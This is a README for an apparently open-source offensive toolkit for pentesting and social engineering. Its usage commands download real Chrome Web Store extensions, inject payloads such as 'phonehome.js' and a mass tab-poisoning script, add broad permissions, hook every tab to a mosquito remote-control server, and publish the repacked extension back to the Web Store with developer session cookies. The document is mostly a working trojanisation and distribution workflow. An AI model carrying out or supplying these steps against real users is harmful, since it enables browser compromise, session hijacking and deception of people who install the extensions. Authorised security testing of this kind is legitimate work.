87 lines
3.0 KiB
Markdown
87 lines
3.0 KiB
Markdown
Various tools for dealing with Chrome Extensions, especially valuable for pentesting / social engineering assignments.
|
|
|
|
Authors:
|
|
|
|
- Krzysztof Kotowicz - @kkotowicz - [blog](http://blog.kotowicz.net)
|
|
- Michele '@antisnatchor' Orru
|
|
|
|
|
|
Injector
|
|
--------
|
|
Bunch of scripts for injecting existing extensions with new code:
|
|
Extensions can be downloaded from Chrome WebStore (repacker-webstore) or taken from crx files (repacker-crx).
|
|
|
|
Requirements:
|
|
|
|
- bash
|
|
- ruby
|
|
- zip (cmd line)
|
|
- curl (cmd line)
|
|
- Google Chrome (used in crx mode only)
|
|
|
|
Usage:
|
|
|
|
# get extension from Web Store, add payloads/phonehome.js and copy the extension to repacked-dir/
|
|
$ injector/repacker-webstore.sh clcbnchcgjcjphmnpndoelbdhakdlfkk dir repacked-dir payloads/phonehome.js
|
|
|
|
# Same, but pack into repacked.zip instead
|
|
$ injector/repacker-webstore.sh clcbnchcgjcjphmnpndoelbdhakdlfkk zip repacked.zip payloads/phonehome.js
|
|
|
|
# Create new CRX with Google Chrome
|
|
$ injector/repacker-webstore.sh clcbnchcgjcjphmnpndoelbdhakdlfkk crx repacked.crx payloads/phonehome.js
|
|
|
|
# Inject into existing CRX file
|
|
$ injector/repacker-crx.sh original.crx crx repacked.crx payloads/phonehome.js
|
|
|
|
# Add some permissions into manifest.json
|
|
$ injector/repacker-crx.sh original.crx crx repacked.crx payloads/phonehome.js "tabs,proxy"
|
|
|
|
# Add persistent content script file launching on every tab
|
|
$ echo 'console.log(location.href)' > cs.js
|
|
$ injector/repacker-crx.sh original.crx crx repacked.crx payloads/cs_mass_poison.js "tabs,<all_urls>" cs.js
|
|
|
|
For example - mass poisoning every tab with [mosquito](https://github.com/koto/mosquito):
|
|
|
|
# start mosquito server:
|
|
$ cd path/to/mosquito
|
|
$ python mosquito/start.py 8082 4444 --http 8000
|
|
|
|
# generate mosquito hook:
|
|
# - visit http://localhost:8000/generate
|
|
# - save hook as cs.js
|
|
|
|
# inject mosquito dropper into extension:
|
|
$ injector/repacker-crx.sh original.crx crx repacked.crx payloads/cs_mass_poison.js "tabs,<all_urls>" cs.js
|
|
|
|
|
|
Webstore Uploader
|
|
-----------------
|
|
Script for uploading and publishing Chrome Extensions packed in zip files in Chrome Web Store
|
|
|
|
Requirements:
|
|
|
|
- ruby
|
|
|
|
Usage:
|
|
|
|
# Preparation:
|
|
|
|
1. Create Chrome developer account
|
|
2. Login at https://chrome.google.com/webstore/developer/dashboard/
|
|
3. Pay your $5 one time fee (credit card needed)
|
|
4. Get SID, SSID, HSID cookies and paste their values in webstore_uploader/config.rb file
|
|
|
|
# Get Chrome extension code
|
|
# e.g. run Injector in zip mode:
|
|
|
|
$ injector/repacker-webstore.sh clcbnchcgjcjphmnpndoelbdhakdlfkk zip repacked.zip payloads/phonehome.js
|
|
|
|
# (optional) - prepare screenshot / description file
|
|
|
|
# publish the extension right away
|
|
$ ruby webstore_uploader/webstore_upload.rb repacked.zip publish description.txt screenshot.png
|
|
|
|
# or just upload & save it:
|
|
$ ruby webstore_uploader/webstore_upload.rb repacked.zip save description.txt screenshot.png
|
|
|
|
# you can access the extension from your developer dashboard |